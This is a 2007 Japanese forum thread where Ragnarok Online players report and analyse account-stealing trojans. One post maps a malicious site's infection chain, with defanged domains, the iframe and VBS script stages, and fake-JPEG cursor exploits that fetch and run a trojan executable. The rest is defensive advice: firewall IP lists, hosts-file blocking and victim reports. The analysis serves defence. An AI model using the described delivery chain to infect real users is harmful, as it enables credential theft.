あう。ごめ。ソースチェッカーのキャッシュ消さずに調べてた。>>851はなしね。もう1回調べなおします。

857 名前:(^ー^*)ノ〜さん :07/04/22 10:06 ID:771ecEqW0
HDDフォーマットワロタ
IE使ってる奴はどんだけマゾだよwwwwwwwww

858 名前:(^ー^*)ノ〜さん :07/04/22 10:12 ID:2ztF4iXU0
ID:771ecEqW0
自称上級者はこれだから困る。

859 名前:(^ー^*)ノ〜さん :07/04/22 10:13 ID:771ecEqW0
どの辺が自称上級者なんでしょうか?

860 名前:(^ー^*)ノ〜さん :07/04/22 10:14 ID:vdVIhQgy0
>>857
人と違ったことで満足感を得る17歳を想像したwwwwwwwww

861 名前:(^ー^*)ノ〜さん :07/04/22 10:20 ID:QfQue/ZX0
「俺○○なんて使ってないし」は一番危ないからな

862 名前:851 :07/04/22 10:28 ID:MyAiI/bk0
>>842
www■aaa-livedoor■net/ro-navi/  (↓frame2個)
→ www■aaa-livedoor■net/ro-navi/wz■htm  (何もなし)
→ www■aaa-livedoor■net/ro-navi/wu■htm  (↓iframe2個)
 → www■aaa-livedoor■net/ro-navi/1■htm  (VBS/Psyme ↓のファイル1個をダウンロード&実行)  
  → www■ro-bot■net/ro-navi/yan■exe  (トロイ本体。TROJ_MARAN.FU)
 → www■aaa-livedoor■net/ro-navi/2■htm  (↓JavaScript1個)
  → www■ro-bot■net/ro-navi/muxiao■js  (↓拡張子JPEGのアニメーションカーソル2個)
   → www■ro-bot■net/ro-navi/muxiao1■jpg  (TROJ_ANICMOO.AX ↓のファイル1個をダウンロード&実行)
    → www■ro-bot■net/ro-navi/yan■exe  (トロイ本体。TROJ_MARAN.FU)
   → www■ro-bot■net/ro-navi/muxiao2■jpg  (TROJ_ANICMOO.AX ↓のファイル1個をダウンロード&実行)
    → www■ro-bot■net/ro-navi/yan■exe  (トロイ本体。TROJ_MARAN.FU)

852さんと内容かぶりまくりだけど、851の訂正ということで・・・
結局行き着く先はyan.exeなので、そこをブロックできれば、まずセーフ。
バスターで検出できるのは、maxiao1.jpg, maxiao2.jpg, yan.exeの3つ。

863 名前:851 :07/04/22 10:39 ID:MyAiI/bk0
>>852
>スクリプト中にある「L_fy80■exe」ってのは、一時的に作成するものかな。

そうです。
サーバー側のファイルwww■ro-bot■net/ro-navi/yan■exeが
ローカルの%TEMP%\L_fy80■exeに作られて、実行されます。

864 名前:(^ー^*)ノ〜さん :07/04/22 10:39 ID:XN6LAYwQ0
スクリプトはすり抜けようと思えばいくらでもできるから放置でいいや。
yan.exeは >>766 のnPack版Maran、比較的新しいので要注意かな。

865 名前:(^ー^*)ノ〜さん :07/04/22 10:49 ID:6oaJHTrE0
そういや俺も高校んとき人と同じのが嫌で
Firebirdにしたのが始まりだったなぁ。

866 名前:(^ー^*)ノ〜さん :07/04/22 14:09 ID:6mkaviQb0
差し替えが早いなぁ……
昨日見たときはro.exeだったのがyan.exeやら何やら。

ちなみに検体を拾いに行ったとき気付いたんだが、トロイを置いてる鯖の性能がどうもイマイチ。
異様にDLに時間がかかった。
UbuntuからFirefox・WindowsからIria・IEで直接DL、の3パターンで拾いにかかったが
どれもタイムアウトしたり。
拾えたと思ったら破損ファイルになってたりで、まともに仕込まれるのか?と逆に心配になった。

IIS6.0と返ってきたので鯖はWindowsServer2003で動いてるようだが、帯域やらの関係かねぇ?

867 名前:(^ー^*)ノ〜さん :07/04/22 14:43 ID:nnZ81cIa0
>>886
確かにサーバーが遅いが、機嫌がいいとすぐくるぞ。むっちゃ遅い時もあるけど。
あっちでは、個人のPCをサーバーとして使うみたいだから、そういうもんかもな。

気軽に差し替えをしてくるのは厄介といえば厄介。
検体送ったら、送ったのは無害だったが、同アドレスのものは新種でしたので対応しましたとか。
回答時も、「確認時点では検出できました」ので、検出されていなければ入手前だった「可能性」が
ありますとか表現に気をつけないといけないですね。

本当に「罠を踏んだ時間≠罠を調べた時間」で差し変わる可能性が高いのが問題。
殆どは、実行ファイルの圧縮形式を変更する形でやってくると思うので、パターンにない
ものでも極力検知する方式のセキュリティソフトを利用することがより重要になるね。
−−−−−
ところで、LiveROの方にあった、ログイン競争になってしまった場合の解決策として
PG2を利用する方法が挙げられていたけど、あれはこっちに持ってきといた方がいいんじゃないかな。

セキュリティ対策、質問・雑談スレ
http://enif.mmobbs.com/test/read.cgi/livero/1173878067/817-818

で、PG2のセーフリストは、これで接続できてます。

//--- ↓をテキストファイルにしてセーフリストに登録
UCOM Corporation:219.123.155.000-219.123.155.255
UCOM Corporation:221.247.195.000-221.247.195.255
RAGNAROK-JP:061.215.212.000-061.215.212.255
RAGNAROK-JP2:061.215.214.128-061.215.214.255
RAGNAROK-JP2:211.013.228.000-211.013.228.255
RAGNAROK-JP3:211.013.232.000-211.013.232.255
RAGNAROK-JP4:211.013.235.000-211.013.235.255
GUNGHO-MODE:211.013.229.000-211.013.229.255
WEB-SYSTEM:061.215.220.064-061.215.220.255
//↑ここまでを記録。コメント行は入れないように。

868 名前:(^ー^*)ノ〜さん :07/04/22 15:22 ID:MyAiI/bk0
>>867
IPリストの最初の2行なんだけど、
全然別の会社が取得しているIPも含まれてるっぽいので
LiveROの817にあるとおり

GUNGHO-PAT1:219.123.155.160-219.123.155.191
GUNGHO-PAT1:221.247.195.160-221.247.195.191

の範囲を指定するのが、適切だと思います。
whoisで調べると、上記がGungHoの所持しているIPになってます。
↑の設定でまだ1週間程度の実績しかないですが、
今のところ問題なくつながってます。

869 名前:(^ー^*)ノ〜さん :07/04/22 15:36 ID:nnZ81cIa0
>>868
指摘感謝。直して使うわ。

まとめサイトにもPG2導入方法とか載せたらどうかな?
リネージュ資料室に、中国とかのIP一覧あるから、踏んでしまったときの送信防止として。

PG2入れようとして、まとめサイトになくてちょっと不便を感じたので。

870 名前:(^ー^*)ノ〜さん :07/04/22 15:58 ID:teg1ylYa0
PG2による全範囲禁止の手法って、解ってる人には極めて有効だと思いますが、
ttp://enif.mmobbs.com/test/read.cgi/livero/1173878067/477 で指摘されているように、
グローバルIPでない場合はすんなり行かないケースがあると思います。
初心者の人に勧める時は、その辺りの注意が必要かもしれませんね

871 名前:(^ー^*)ノ〜さん :07/04/22 15:58 ID:6mkaviQb0
>869
まとめサイトにはPG2の導入ページは存在してる。
>ttp://sky.geocities.jp/vs_ro_hack/pg2.htm
ただTOPから直接飛べないから見落としやすいので、判りやすくした方が
いいとは思う>まとめサイトの人

それと最近の被害報告等を見る限り、hosts変更とPG2導入は>6の簡易まとめの
中に入れて、積極的に勧めた方がいいんじゃないだろうか。
この2つをしてるかどうかでかなり違うし。

hostsを自動更新出来るように出来れば楽になるんだが、使用環境で変わるのが何とも。
面倒くさがりなギルメン用にツール作ろうかと思案中なんだが、なかなか……

872 名前:(^ー^*)ノ〜さん :07/04/22 16:00 ID:6mkaviQb0
後テンプレの報告欄に
【hosts変更】(有/無 [有りの場合は最終更新は何時ごろか])
【PeerGuardian2導入】(有/無 [有りの場合は参照元サイトはどこか)
を入れたほうがいいような気もする。

追加してたら、報告者もこれらが重要な対策だ、と気付いてくれる気がする。

873 名前:(^ー^*)ノ〜さん :07/04/22 16:34 ID:nnZ81cIa0
>>870
全拒否ではなくても、リネージュ資料室にある2つのリストを指定するだけで十分じゃないかな。
今の所、日本国内サイトに垢ハックトロイの実体置かれたり、収集先が日本国内だったりするケースは
報告されてない訳だし、それなら自分の使っているDNS鯖とかのブロックはしないで済む筈。

Lineageトロイ http://lineage.nyx.bne.jp/misc/security/lintrojan.txt
中国・韓国・台湾 http://lineage.nyx.bne.jp/misc/security/cnkrtw.txt

>>871
あったんですね。気づかないで申し訳なかった。
でも、そのページだけだと、ROの領域の許可方法が抜けてますね。

P2Pブロックをかけなければ、ROの許可しなくても、通信できるんですけど、
P2Pとスパイウェアのリストもブロックに入れちゃってたもので、私は設定に困りました。
PG2公式ユーザガイド見ながらだと、推奨でP2Pブロックにチェックするようになってるので
他の人もはまるかなと。

874 名前:(^ー^*)ノ〜さん :07/04/22 17:00 ID:6mkaviQb0
>873
そろそろセキュスレ向きな気がしないでもないが、それだと意味が無いというか勘違いしてる。

セキュスレに書かれた方法は全IPを拒否した上でRO関係の通信のみを許可し、他に情報が
全く流れない状態を作る。
つまり既知のハクアドレスだけじゃなく未知のアドレスもブロックして、パス変更を行っても
他に漏れない状態を作りあげるのが目的。
これなら設定をミスって無ければ、感染した状態でパス変更しても漏れない。
つまりパス変更しつつログイン競争を行う事が可能になる。

>873のは単にP2Pリストを外せで終わる話。
さらに言えば、中韓台のリストを組み込んでいたところで、未知のアドレスに対して送信とか
jpドメイン宛に送信される設定とかになってるトロイには全くの無力。
今はないとは言え、例えば多数報告のある ofsfbなODN に対してパスを送信するタイプが
出た場合その設定だとログイン競争をした場合、パスが漏れる。

全拒否設定の方は、目的がそもそも違う。
中韓台をブロックするだけで100%安全と言えるなら、あの話は出てきてないよ。

875 名前:(^ー^*)ノ〜さん :07/04/22 17:04 ID:XN6LAYwQ0
>>867
ファイルの差し替えについてはチェックするしかないなぁ。
リネージュ資料室のウィルス更新状況みたいにCGI流すとか、
ローカルでやるならWWWCとか。自分は改造したWWWD
(USER_AGENTで蹴られると嫌なので書き換えてある)。

圧縮形式の変更はあまりやってないみたい。
一連のlovetw・zhangweijp系ほとんどUpackで、
先週あたりから試験的にnPackを投入している感じ
他ではUPX、NSPack、ASPack、BEP、PEC2、FSGなどがたま〜に。

876 名前:(^ー^*)ノ〜さん :07/04/22 17:45 ID:66Korv5H0
>まとめサイトの人
個人的な要望で申し訳ないんですが、危険サイト・ドメインのリストの内容を
単体のテキストにまとめて置く事は出来ないでしょうか?

ttp://sky.geocities.jp/vs_ro_hack/hosts.htm の中から # Trojan trap sites から
# End of trojan trap sitesだけを記載してるファイル、という意味です。

もしそれが可能ならwgetとcopyコマンドを利用してhostsの自動更新バッチファイルが
作成出来、タスクに組み込めばPG2の更新と同等の自動更新設定出来るのですが……

ギルメンの対策状況を見てる限り、hostsをまめに更新してる人が少ないようで、自動更新の
バッチファイルが作れたら、タスクに放り込むだけでかなりの対策強化になると思うのです。

>871氏と同様、自動更新するツールを作ってるんですが、それがあるとバッチファイル1つで
済むので導入を勧めやすくなるのです。
自作ツールだとソースが読めないと信憑性が疑われやすいという問題もありまして……

御一考頂けたら幸いです。

877 名前:(^ー^*)ノ〜さん :07/04/22 18:10 ID:nnZ81cIa0
>>874
全拒否の理由はわかってるよ。でも、自分のDNSやらゲートウェイやら必要なものを手動で解除しないと
許可リストのサイトへの接続すらできなくなって現実的ではない。

PG2を入れていない人に対する説明を行なう為に「実際的」なのは盗み出されたパスワード等を送信させない宛て先として
既知の送信先の中国等を一括禁止するだけで安全性が上がる。そのブロックしなければならない未知のアドレスは
その中に含まれている可能性が高く、PG2を導入させる意味があるってこと。

自分のDNSの確認方法がわからない場合、それを探している間、自分がパスワード変更できなくなってしまう。
それはパスワード変更合戦になっている段階では致命的欠点。迅速さと完璧ではないまでもかなり有効な対策として
踏んでしまった場合、パスワード変更前に、PG2を導入して一定範囲の送信をブロックすることには意義が有るよ。

完璧な対応を求める余り、本末転倒になっちゃだめだよ。

878 名前:(^ー^*)ノ〜さん :07/04/22 18:14 ID:KMiXEDf40
>>877
俺にはあんたの言ってる事の方が的外れな気がするが・・・

879 名前:(^ー^*)ノ〜さん :07/04/22 18:17 ID:KFFhhmP30
LiveROでもこっちとまたいで同じネタやるならどっちかに統一したら?

880 名前:(^ー^*)ノ〜さん :07/04/22 18:22 ID:MyAiI/bk0
>>876
一点注意があるんだけど、hostsの変更を自動で行った場合、
危険性もそれなりに付きまといます。例えば、

(罠サイトのIPアドレス) www.google.co.jp

という設定をhostsに書き込むと、googleに繋いだときに、
罠サイトに飛ばされるようになります。
要は万一中華にそのページをハッキングされ、内容を改ざんされたら・・・

念には念を入れて、IPの方は強制的に127.0.0.1に書き換えるか、
127.0.0.1で始まらない行はもう無視するかした方が良いように思います。
あるいは、ホスト名のリストだけにしてもらって、127.0.0.1は自分で
付加するとかなら、バッチファイルで実現できるかな。

まあ、実際にはそうそう簡単にハッキング食らうこともないとは思いますが、
何でもやる連中なので、念のためそんな危険性もありますよとだけ。

881 名前:(^ー^*)ノ〜さん :07/04/22 18:23 ID:bECDfUmq0
パスワード変更合戦に陥ったときに
・PG2をDLしてインストールして
・中韓台をブロックする設定にして
・パスワード変更する
これ、かなり無理があると思う。

>874も言ってるが、これ以上はセキュスレでやったほうがいいと思う。

882 名前:(^ー^*)ノ〜さん :07/04/22 19:00 ID:mz86ZK1R0
ROM776のお絵かき掲示板についに投稿者のHNと絵を使ったハクサイト宣伝するヤツが来た
警告あげ

883 名前:(^ー^*)ノ〜さん :07/04/22 20:00 ID:hcVEN26q0
【  アドレス   】 http://www■biglobe-ne■com/bbs
【気付いた日時】 2007/4/22 19:41
【     OS    】 Window XP MCE
【使用ブラウザ 】 Sleipnir2.5.10
【WindowsUpdateの有無】 4/20
【 アンチウイルスソフト 】 NortonInternetSecurity2007
【その他のSecurty対策 】 ルータ
【 ウイルススキャン結果】 無し
【スレログやテンプレを読んだか】 Yes

ロードオブザオンラインWikiで踏みました。
メニューバーのリンクが垢ハックのアドレスの物に書き換えられてました。
今日偶々>>842のに引っかかりかけて、このスレッドに来てHostsを変更していた為被害はありませんでした。
 
■メニューバーの変更履歴
ttp://lotro.netoge.net/wiki/index.php?cmd=diff&page=MenuBar

884 名前:(^ー^*)ノ〜さん :07/04/22 21:07 ID:7+jCZolx0
>880
「# Trojan trap sites から # End of trojan trap sitesだけを記載してるファイル」と
言ってるから、>876が考えてるwgetとcopyを使った自動更新って、こんな感じだろう。

※wget:コマンドラインで動くダウンロードツールでIriaやIrvineのようなもの。
     指定したURLからhtmlやファイルをDL出来る。
     元はUnix系のものだが、Windows版もある。

(1)自分用のhosts(例:MyHosts.TXT)を用意し、独自設定があればそれに記入
 (独自設定が無ければOS標準のものそのままで良い)
(2)wgetで設定済みのhosts(例:DangerHosts.TXT)をDLする
 (中身は127.0.0.1 hogehoge.comみたいな形) 
(3)COPY MyHosts.TXT+DangerHosts.TXT %SystemRoot%\System32\Drivers\etc\hosts

(2)と(3)の部分を書いたバッチファイルをスタートアップに入れるなりタスク設定
するなりしておけば、自動更新が出来る。
万が一他のトロイがhostsを改変したとしても、この形なら常に作り直しされるので
(1)で用意したものを別フォルダに保存しておけば、かなり安全と言えそうだし
PG2の危険アドレスの自動更新と同レベルの手軽さになると思う。

885 名前:(^ー^*)ノ〜さん :07/04/22 21:11 ID:lwBCw9SW0
>>882
なんだかROM776狙われてるって位最近また頻繁になってきたねー。
お絵かきだけじゃなく質問&SS板にも垢ハック系の書き込みされてる。

しかし未だにURLをほいほい踏むのって・・・危機感なさ過ぎるよorz

886 名前:(^ー^*)ノ〜さん :07/04/22 21:24 ID:J9p6yX5a0
数少ないRO関係サイトの中でも最大手なんだから狙われて当然

887 名前:(^ー^*)ノ〜さん :07/04/22 21:49 ID:nnZ81cIa0
>>884
ちょっと気が効いたセキュリティソフトは読み取り専用にしてたりするので、attribで属性いじるとかあるし。
この辺は総合対策スレに移動した方がいいんじゃないだろうか?

888 名前:880 :07/04/22 21:58 ID:MyAiI/bk0
>>884
えっと、私が心配していたhostsの改ざんというのは、WEBページの方の話で、
まとめサイトの管理人さんが作ってくれたページが改ざんされた場合に、
その改ざんされたhostsをダウンロードして、ローカルのhostsを作成すると
罠サイトに直行してしまう可能性があるなと・・・

PG2のリストとかなら最悪改ざんされても、罠を踏まない限りは問題ないですが、
hostsだと頻繁に利用しそうなホスト名を登録しておけば、そのまま罠に直行してしまいますので。

自分でも、ちょっとそれは心配しすぎかなとは思ってますが、
hostsは悪用されれば危険な代物なので、念のため指摘させて頂きました。

889 名前:(^ー^*)ノ〜さん :07/04/23 00:09 ID:QfDW7z2C0
【  アドレス   】http://www■fcty-net■com/
【気付いた日時】 4月22日19:00頃、踏んだ直後に
【     OS    】 WINDOWSXP SP2
【使用ブラウザ 】 IE6,0 SP2
【WindowsUpdateの有無】 自動更新、毎日03:00設定
【 アンチウイルスソフト 】 NortonAntiVirus2003
【その他のSecurty対策 】 Spybot S&D、ルータ
【 ウイルススキャン結果】 Nortonで完全スキャンした結果ウイルスは
見つからず。今カスペルスキーオンラインスキャンかけてます。
【スレログやテンプレを読んだか】 Yes

【説明】自分のブログに書き込まれていたコメントで踏みました。
友人の名前で書き込みされていて、友人のブログは更新されている
かなあ、と思って友人のブログを訪問しようとして気軽に踏んで
しまいました_| ̄|○ 飛んだ先では画像がゆっくりと表示されて
おり、画像は他MMOのスクリーンショットの様なものでした。

これはおかしいと思って、ソースチェッカーオンラインで調べたら
※このアドレスは危険URLの一つです。と出ました。
ROにログインしている状態だったので、慌ててネット接続を切断して
実家のPCからガンホーPASS、アトラクションPASSを変更しました。
今のところお金や装備は無事の様です。

画像ファイルに拡張子を偽装したウイルス感染を実行するScript等を
アップローダ等に置いて感染させる〜項目で、IE6sp2以降では インター
ネットオプション → セキュリティ → レベルのカスタマイズ → 拡張子
ではなく内容で開く をONにすれば防げると書き記されていて、見てみたら
ONになっていたので感染はしていないのでしょうか。

念のため、お金と装備の大部分を実家PCで友人に預けておきましたが
自宅からは怖くてROにログインできません……不安を解消したいなら
OSの再インストール、もしくは自己責任でこのままROを続ける、の
二択しかないのでしょうか。どうかご教授のほど、よろしくお願い
致します。

890 名前:(^ー^*)ノ〜さん :07/04/23 00:19 ID:WGsznVtv0
そうでぃす、二択でぃす

891 名前:(^ー^*)ノ〜さん :07/04/23 00:29 ID:tkq7AiXL0
>ネットオプション → セキュリティ → レベルのカスタマイズ → 拡張子
>ではなく内容で開く をONにすれば防げると書き記されていて、見てみたら

逆。OFFにしないと駄目。デフォルトではONになっている。

jpeg拡張子でも、中味がhtmlならhtmlで開こうとする機能。便利だけど、垢ハックのことを考えたらOFFにしよう。

892 名前:(^ー^*)ノ〜さん :07/04/23 01:21 ID:QFYHT8bK0
>>889
>【 アンチウイルスソフト 】 NortonAntiVirus2003

気になったんだが、これは2006年10月17日で更新サービスが終了してるぞ。
半年も前に更新が終了したアンチウイルスソフトなど役に立たない。
すぐにでも新しいソフトの導入をしたほうがいい。

893 名前:(^ー^*)ノ〜さん :07/04/23 01:22 ID:MWw/lH0W0
【      気付いた日時          】 2007/04/22
【不審なアドレスのクリックの有無 】 有名な取引掲示板。
【他人にID/Passを教えた事の有無】 知ってるか知らないけど、旦那だけ。
【他人が貴方のPCを使う可能性の有無】 使ってないとは思うけど、旦那。
【    ツールの使用の有無      】 ツールはすべて不正?だと思っているので使ってないです。
【  ネットカフェの利用の有無    】バリバリあり。(よくいくのは2箇所)
【     OS    】 WindowsXP PS2
【使用ブラウザ 】 IE6
【WindowsUpdateの有無】 2007/04/22
【 アンチウイルスソフト 】 ウイルスセキュリティ
【その他のSecurty対策 】 ルータ2台(V110ひかり電話・無線ルータ・ハブ)
【 ウイルススキャン結果】 いろんなソフトを使ったけど引っかからず。
【スレログやテンプレを読んだか】 読みました。
【説明】
ここに書いてあるファイル名やら、別のページにあったファイル名を手動で検索してみましたが、
1つも引っかからず。
別のPCでパスは変更したので、垢ハックは大丈夫だと思うのですが;
(高い装備はないけど、製造系アイテムは結構ある;)
有名な取引掲示板で誤クリックしたら、白いページしか表示されず・・・。
ただ、自動インストールにはポップアップにしてたのですが、それも起動せず。
やっぱり、OS再インストの方がいいんでしょうかー?
なにも引っかからないのに再インストしても安全?

旦那に連絡つかなくて、とっても不安すぎて寝れません。
どーしましょう;
誰か助けてほしいです;

894 名前:(^ー^*)ノ〜さん :07/04/23 01:33 ID:WGsznVtv0
とりあえずカスペオンラインスキャン
別PCから変更してるなら、踏んだPCでは一応の安全が取れるまでは何もしないでおく

895 名前:(^ー^*)ノ〜さん :07/04/23 01:34 ID:wgk3mRde0
分多PCでログインやアトラクションセンターなどの
パスワード入力する行為さえしていなければ大丈夫。
とりあえず落ち着いて対処しましょう。

896 名前:893 :07/04/23 01:38 ID:MWw/lH0W0
レスありがとうございます〜。
いまから、カスペオンラインスキャン試してみます。

もし引っかからなかったらまた相談に来ます。

ありがとうございました〜。

897 名前:(^ー^*)ノ〜さん :07/04/23 01:39 ID:cE+W7bAO0
そんなに不安なら再インスコが一番手っ取り早いし気分的にも楽
安全ってお墨付きもらってもやっぱ不安だろ?

898 名前:(^ー^*)ノ〜さん :07/04/23 01:43 ID:7Vk2pWLQ0
垢ハックに感染した時のOS再インストールはHDDのフォーマットまでやらないと駄目なのかな
NortonGhostやAcronis True Imageの様なバックアップツールで感染前に戻す事でも解決出来るんだろうか

899 名前:(^ー^*)ノ〜さん :07/04/23 01:44 ID:QFYHT8bK0
>>893
その該当PCでROのIDやパスワードを入力する行為をしてなければ大丈夫。
別PCでパスワードも変更されてるようなので、まずはそのままで落ち着こう。

すでに実行されてるかもしれませんけど、もししてないようなら
以下のオンラインスキャンをしてみましょう。
・カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
http://www.kaspersky.co.jp/scanforvirus/

これで何も見つからなくても絶対に大丈夫とは言えません。
不安なようならOS再インストールが確実。
ここの最終判断は自己責任でどうぞ。

900 名前:899 :07/04/23 01:46 ID:QFYHT8bK0
リロードしろ俺orz

901 名前:889 :07/04/23 01:58 ID:QfDW7z2C0
>>890〜892
すばやいレスありがとうございます、さっそく対策をとってみます。
今のところカスペルスキー先生は

見つかったウイルス:8
感染したオブジェクト:18

と仰っております(;´Д`)現在59%までスキャン完了。
とりあえず明日アンチウイルスソフト買ってこよう……。

902 名前:(^ー^*)ノ〜さん :07/04/23 02:03 ID:WGsznVtv0
( ゚д゚)…

( ゚д゚ )

903 名前:(^ー^*)ノ〜さん :07/04/23 02:03 ID:tkq7AiXL0
ダウンロード販売という手段もありますが、感染しちゃってるPCで落とすよりは、
買ってきた方がいいかもね。

ROへのログイン、パスワード変更などを踏んだ後1回もやらなければ大丈夫だから
ゆっくり寝てクリアな頭で対処したほうがいいよ。

904 名前:893 :07/04/23 02:19 ID:MWw/lH0W0
皆さんやさしい人達ばかりで感謝です。
まだ半分までのスキャンですが、途中報告。

ウイルスが1つ見つかりました。
ってもまだ50%スキャンが残ってますが・・・。
オブジェクトも13個感染?してるっぽいので、OS再インストール&HDDフォーマット
までしてみる予定です。

ちなみに・・・。
HDDがCとDで、2つに分けてる(最初から分けてあった)のですが、
Dディスクの中身CD−Rに焼いても大丈夫なのかな・・・?
CG作ったものとか入ってたので;

もしお暇だったら・・・。
決済系(銀行やらWebmoneyとか。)のPassも変えてたほうがいいんでしょうかね〜?
まぁ、今残高0なんですけど;
どこまでパクるウィルスかわかんなくて困る;

905 名前:(^ー^*)ノ〜さん :07/04/23 02:38 ID:QseVKLBV0
>904
>決済系(銀行やらWebmoneyとか。)のPassも変えてたほうがいいんでしょうかね〜?

……ROのPASSよりそっちの方が重要だろ……

906 名前:(^ー^*)ノ〜さん :07/04/23 04:12 ID:wYMg+Fi30
>>898
有用なのだが、そこまで気を使うユーザーが少ないのと、プログラムとデータの分離を心がけていないからだろうな。
ファイル鯖に作り込めば、PXEブート利用、一切の外部メディア不要のリカバリが可能なのだが。

>>904
とりあえず、検出結果ログが出てくるだろうから、ウィルスの名称だけでもここに書くといいよ。
それと、ネットバンクは残高が無いからと言って安心は出来ない。
資金洗浄の中継口座に利用されて、桜田門さんがお宅訪問なんて可能性だって十分にある。

907 名前:(^ー^*)ノ〜さん :07/04/23 08:48 ID:Ct8iu3jj0
昨日カスペルスキーを導入したのですが、
完全スキャンを行ったところ、「Trojan-Dropper.Win32.VB.kb」なるトロイがゴミ箱から発見?されたといわれました。

検索してもハングルのページが引っかかるだけなので一体どういったものなのでしょうか?
駆除は出来たと言われました。

908 名前:(^ー^*)ノ〜さん :07/04/23 09:10 ID:iiW0wCLC0
カペルスキーのデータベースに詳細がまだ乗ってない奴だな
正直どんな奴かわからん
感染ファイルがゴミ箱の中にあったっていうことは、そのファイルをいつ捨てたのかはわからないが、潜在的にトロイに感染してたと見てよさそう
いつから感染してたのか特定できなさそうだから駆除できたからといって安心はしない方がよさそうな気がする

909 名前:(^ー^*)ノ〜さん :07/04/23 10:07 ID:x54csjYh0
Dropper型は発動時にファイルを作成するタイプを指すので、亜種によって物が違うはず。

実体の方を検知出来てないなら、発動前にゴミ箱入った・駆除済み・未検出、のどれか。
垢ハックに関係するか、また無害かどうかは情報が無いので何とも。
用心だけはした方がいいかもね。

910 名前:(^ー^*)ノ〜さん :07/04/23 11:09 ID:KZ3HEdWx0
Downloaderならそのまま捨てだな。

911 名前:(^ー^*)ノ〜さん :07/04/23 12:10 ID:wgk3mRde0
公知イベントスレにアカハックURL。文的に中華じゃなさそうだが・・・

912 名前:(^ー^*)ノ〜さん :07/04/23 12:14 ID:KZ3HEdWx0
いや中華だと思うよ。エロSPAM等からのコピペはよくあること。

913 名前:(^ー^*)ノ〜さん :07/04/23 12:55 ID:GafWPkFf0
エロSPAMどころか同じ掲示板の他の記事をコピペして
後ろにURL追加 or 記事中のURLを垢ハックのモノに変更

というのもあるから困る

914 名前:(^ー^*)ノ〜さん :07/04/23 13:30 ID:KZ3HEdWx0
名前も他からパクったりするから始末悪いよな。

915 名前:(^ー^*)ノ〜さん :07/04/23 16:30 ID:BidKvYoH0
776で告知されてたけど、ついに国内のIPから垢ハックURLが貼られるようになったとか…
どんどん凶悪化が増してきてるなぁ…

916 名前:(^ー^*)ノ〜さん :07/04/23 17:11 ID:uiBop3kD0
>883
このURL書き込みがゲーム系WIKIで氾濫している模様。
DDOWIKIの一つもメニューがかなりいじられてました。
【  アドレス   】 http://www■biglobe-ne■com/bbs
【気付いた日時】 2007/4/23 15:00頃
【     OS    】 Window XP
【使用ブラウザ 】 IE6
【WindowsUpdateの有無】 4/20
【 アンチウイルスソフト 】 avast!
【その他のSecurty対策 】 ルータ
【 ウイルススキャン結果】 無し
【スレログやテンプレを読んだか】 あるていど。

フンヂャッタ!
…のでアドレス内を探検
キーロガー系かなぁ、と思います。
踏んじゃったのでソースをあさっていたらW u、W zやh a p p y1-3というページが0サイズフレームで組み込まれていました。
中身をたどるとt■exというファイルのダウソなどが入ってます。
ttp://www■biglobe-ne■com/ を覗くと文字化けしたっぽい変な文章があるので中系かな。
トレンドマイクロの新しいオンラインスキャナでダウンローダー系2種、
かすぺで一個(のっとあウィルスになってたが)が出てきた。

まあ、WIN再インスコしてくるわー。

917 名前:916 :07/04/23 17:11 ID:uiBop3kD0
sage忘れスマソ。

918 名前:(^ー^*)ノ〜さん :07/04/23 17:43 ID:XOura1jP0
うちの場末ブログのコメントにも奴らがとうとう来やがったぜ。
他の人も報告してたように、Googleで引っかけたようだ。
アクセス解析によると検索語句は「forsety鯖」。リモホは例によって福建省

>>915
愉快犯のアホな日本人がいるんじゃないかと思ってる。
アホってのはいつだって斜め上だからな。

919 名前:(^ー^*)ノ〜さん :07/04/23 17:52 ID:tRpaxflm0
踏んだ踏んだ騒いでる奴、なんで感染すると分かっててIEなんか使ってるんだろうな

920 名前:(^ー^*)ノ〜さん :07/04/23 17:59 ID:HKeslZH60
firefox信者ktkr

ブラウザを気にするよりアンチウィルスソフトを気にした方がいいと思うがっ

921 名前:(^ー^*)ノ〜さん :07/04/23 18:21 ID:GoGHrjll0
ブラウズするだけならLinuxでいいじゃね

922 名前:(^ー^*)ノ〜さん :07/04/23 18:38 ID:tRpaxflm0
>>920
IE信者うぜえから消えろカス

923 名前:(^ー^*)ノ〜さん :07/04/23 18:44 ID:knm/u6Om0
せめて「IE自体が垢ハックなんだから自業自得www」くらい突き抜けてほしいな

924 名前:(^ー^*)ノ〜さん :07/04/23 18:46 ID:lpuSEO7qO
面倒になったんで俺はブログのコメントトラバ拒否にしてリンクさせたteacup系掲示板にコメントさせるようにした
びっくりするくらい楽になったわ。

925 名前:(^ー^*)ノ〜さん :07/04/23 20:21 ID:TYNG3PaY0
て言うか、普通に危険度はIE>Firefoxでしょ

926 名前:(^ー^*)ノ〜さん :07/04/23 20:47 ID:QEki8d1+0
ここじゃ何なのでセキュスレの方で存分に語ろうぜ。

普通に勧めるならともかく、高飛車な態度でバカにしに来てる時点でお察しだが。

927 名前:(^ー^*)ノ〜さん :07/04/23 20:52 ID:KZ3HEdWx0
>>916
interqzのt1.exe、ありふれたUpack圧縮Maran。
これを検知できないのは今時ないんじゃないかなぁ。

>>918
踏んで身包み剥がされた奴が八つ当たりしてるのかもなぁ。

928 名前:(^ー^*)ノ〜さん :07/04/23 21:20 ID:KZ3HEdWx0
げー…。
www■rormb■com がまた凄まじいスクリプト書いてる…。
相変わらずだなこいつ。

929 名前:(^ー^*)ノ〜さん :07/04/23 21:26 ID:wgk3mRde0
国内なら足つくかね?逮捕されて報道でもされてくれると認知されやすくなるが。

930 名前:(^ー^*)ノ〜さん :07/04/23 21:54 ID:mwtLagjl0
【  アドレス   】http://picopico.dip.jp/ragnarok/upload.do?actionType=1&srvGrp=3(ぴころだ)の1177257973173
【気付いた日時】 4月23日21:30頃(同ページの垢ハック注意 1177257973173を見て。踏んだのは4月23日02:00ごろ)
【     OS    】 WINDOWSXPHE SP2
【使用ブラウザ 】 IE7.0 SP2
【WindowsUpdateの有無】 自動更新
【 アンチウイルスソフト 】 NortonAntiVirus2006
【その他のSecurty対策 】 Spybot S&D、ルーター
【 ウイルススキャン結果】 Nortonで完全スキャン・カスペルスキーオンラインスキャンで反応なし。
【スレログやテンプレを読んだか】 Yes

とりあえず報告。
ウィルスもなにも検知されてないので、垢ハック注意、というのが嘘かもしれないけど、
私じゃ真偽の確認ができないので、踏んだ人、踏むかもしれない人のために報告。

931 名前:(^ー^*)ノ〜さん :07/04/23 21:58 ID:Edg0Os8H0
>>930
そんな提示の仕方じゃ踏んじまうじゃないか…しんでくれorz

